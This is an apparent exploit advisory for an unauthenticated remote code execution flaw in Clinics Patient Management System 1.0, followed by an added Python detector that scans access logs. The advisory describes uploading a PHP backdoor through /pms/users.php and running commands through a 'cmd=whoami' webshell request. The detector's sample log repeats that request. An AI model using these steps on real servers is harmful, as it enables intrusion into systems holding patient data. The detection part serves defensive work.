Clinics Patient Management System 1.0 Unauthenticated RCE Vulnerability / Exploit
Exploit / Vulnerability Discovered: 2024-02-05 | Type: webapps | Platform: php
This exploit / vulnerability, Clinics Patient Management System 1.0 unauthenticated RCE, is for educational purposes only; if you use it, you do so at your own risk!
## Unauthenticated users can access /pms/users.php and upload a malicious PHP file in place of a profile picture image, without any authentication.
POST /pms/users.php HTTP/1.1
Host: 192.168.1.36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
## After the attacker sends the file upload request, the application adds a random number to the beginning of the uploaded file's name. The malicious file can be seen under the path /pms/users.php without any authentication.
## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami, the attacker can execute arbitrary commands on the application server.
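Detection logic for the behaviour described above, as an added example that is not part of the original advisory: it scans web-server access logs for requests under /pms/user_images/ that are not plain image fetches and records whether the same client POSTed to /pms/users.php beforehand. The combined log format, the image extension allowlist, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

UPLOAD_ENDPOINT = "/pms/users.php"     # upload endpoint named in the advisory
UPLOAD_DIR = "/pms/user_images/"       # upload directory named in the advisory
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}  # assumption: valid profile pictures

# Assumption: Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_suspicious(lines):
    """Flag requests into the upload directory that are not plain image fetches."""
    uploaders = set()  # clients seen POSTing to the upload endpoint so far
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        path = unquote(url.path)
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            uploaders.add(m["ip"])
            continue
        if not path.startswith(UPLOAD_DIR):
            continue
        name = path[len(UPLOAD_DIR):]
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in IMAGE_EXTS and not url.query:
            continue  # ordinary image fetch
        findings.append({
            "ip": m["ip"], "time": m["ts"], "file": name,
            "served": m["status"] == "200",    # the server answered for this file
            "has_query": bool(url.query),      # parameters passed to an "image"
            "uploaded_first": m["ip"] in uploaders,
        })
    return findings

# Constructed sample log lines (client addresses are documentation-range values).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2024:10:00:01 +0000] "GET /pms/user_images/1700000001avatar.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Feb/2024:10:02:11 +0000] "POST /pms/users.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Feb/2024:10:02:30 +0000] "GET /pms/user_images/1696676940simple-backdoor.php?cmd=whoami HTTP/1.1" 200 24 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [05/Feb/2024:10:05:00 +0000] "GET /pms/user_images/1700000002photo.phtml HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]
```

A finding with `served` and `uploaded_first` both true is the highest-priority case: the same client uploaded through /pms/users.php and then received a response from a non-image file in the upload directory.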